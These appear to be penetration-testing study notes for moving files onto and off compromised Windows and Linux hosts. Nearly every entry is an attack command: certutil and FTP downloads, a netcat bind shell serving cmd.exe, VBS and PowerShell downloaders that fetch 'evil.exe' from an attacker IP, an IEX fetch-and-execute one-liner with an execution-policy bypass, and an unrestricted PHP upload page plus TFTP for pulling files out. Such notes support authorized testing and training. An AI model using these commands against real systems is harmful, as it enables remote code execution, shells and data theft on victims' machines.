File transfers

// File Transfers

// CertUtil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt

// HTTP server
python -m SimpleHTTPServer 80
// Browser
// navigate directly to the file
// FTP
python -m pyftpdlib 21 (attacking machine)
ftp 10.10.10.10
// Linux we can simply use wget

// File transfer notes
sudo apt update && sudo apt -y install pure-ftpd

cat setup-ftp.sh

groupapp ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDb 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
systemctl restart pure-ftpd

non-interactive shell (lack useful features like tab control etc and don't get std output)
interactive (requires interaction)

Upgrading a non-interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'

transferring files with windows hosts
non-interactive ftp download
nc.exe -lvnp 4444 -e cmd.exe
sudo cp /usr/share/windows-resources/binaries/nc.exe /ftphome/
sudo systemctl restart pure-ftpd
echo open 1.2.3.4 21>ftp.txt
echo USER test >>ftp.txt
echo lab >>ftp.txt
echo bin >>ftp.txt
echo GET nc.exe >>ftp.txt
echo bye >>ftp.txt
ftp -v -n -s:ftp.txt

// wget.vbs
// windows downloads using scripting languages
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs


#After you've created wget.vbs
cscript wget.vbs http://1.2.3.4/evil.exe evil.exe

// powershell wget
echo $webclient = New-Object System.Net.Webclient >>wget.ps1
echo $url = "http://1.2.3.4/file.exe" >> wget.ps1
echo $file = "evil.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
echo $webclient = New-Object System.Net.Webclient >>wget.ps1

// powershell execution
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://1.23.4/hello.ps1')


// Windows downloads with exe2hex and powershell
upx -9 nc.exe
exe2hex -x nc.exe -p nc.cmd
head -n 3 nc.cmd
cat nc.cmd | xclip -selection clipboard

// windows uploads using windows scripting languages
cat /var/www/html/upload.php
<?
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>

sudo mkdir /var/www/uploads
sudo chmod 777 /var/www/uploads/
sudo chown www-data: /var/www/uploads

powershell (New-Object System.Net.Webclient).UploadFile('http://1.2.3.4/upload.php','file.exe')

// Uploading files via TFTP
sudo apt -y install atftp
sudo mkdir /tftp
sudo atftpd --daemon --port 69 /tftp

tftp -i 1.2.3.4 put file.exe